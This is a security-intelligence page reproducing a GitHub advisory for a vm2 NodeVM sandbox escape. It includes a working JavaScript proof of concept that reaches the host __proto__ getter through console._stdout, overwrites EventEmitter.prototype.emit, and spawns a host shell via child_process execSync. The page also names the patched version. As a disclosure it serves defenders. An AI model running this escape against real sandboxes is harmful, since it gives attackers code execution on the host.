OFFLINE
Awaiting data
Security intelligence
CriticalCritical vulnerability

CVE-2026-92955: vm2: Sandbox Escape (NodeVM)

GitHub Advisories · officialPublished Oct 5, 2026Risk 50/100

## Summary It being possible to obtain the host `__proto__` getter/setter, has been used in many reports: - https://github.com/patriksimek/vm2/security/advisories/GHSA-vwrp-x96c-mhwq - https://github.com/patriksimek/vm2/security/advisories/GHSA-v6mx-mf47-r5wg - https://github.com/patriksimek/vm2/security/advisories/GHSA-grj5-jjm8-h35p - https://github.com/patriksimek/vm2/security/advisories/GHSA-47x8-96vw-5wg6 Yet it was never patched... --- This can, still, be used to escape the sandbox, one example (I'm sure there's other ways as well), is via `console._stdout`/`console._stderr` (`NodeVM` with `console: 'inherit'`, which is the default) ## Details The prototype chain for `console._stdout`/`console._stderr` is: ``` _stdout / _stderr -> WriteStream (TTY only) -> Socket -> Duplex -> Readable -> Stream -> EventEmitter ``` `process` is an `EventEmitter`, and nothing stops us from writing things to `EventEmmiter.prototype` By overwriting `EventEmmiter.prototype.emit` with a function, and making `process` emit an event (e.g. `exit`, `unhandledRejection` etc.), we can execute code with `this` being `process`. This also bypasses `--disallow-code-generation-from-strings`, which blocks the "usual" escape of obtaining the host function constructor. ## PoC ```js const { NodeVM } = require("vm2"); code = ` const gP = Buffer.call.call(__lookupGetter__,67,'__proto__'); // vm __proto__ getter console.log(__lookupGetter__.call(0,'__proto__').call(console._stderr)); // [Object: null prototype] {} // host __proto__ getter console.log(gP.call(console._stderr)); // Socket { [...] } let p = console._stdout; while (p.pipe) { console.log(p.constructor.name); p = gP.call(p); }; p.emit = function(){ console.log(this+[]); this.getBuiltinModule("child_process").execSync("sh",{stdio:"inherit"}) } `; const vm = new NodeVM(); vm.run(code); ```

Upgrade affected packages to a patched version: vm2 3.11.8.

Vendor
Not specified
Product
vm2
Exploitation
none known
Evidence
official
CVSS
10.0

This record is attributed to GitHub Advisories. Exploitation status and remediation guidance are kept separate from the vulnerability's technical severity.

Open primary source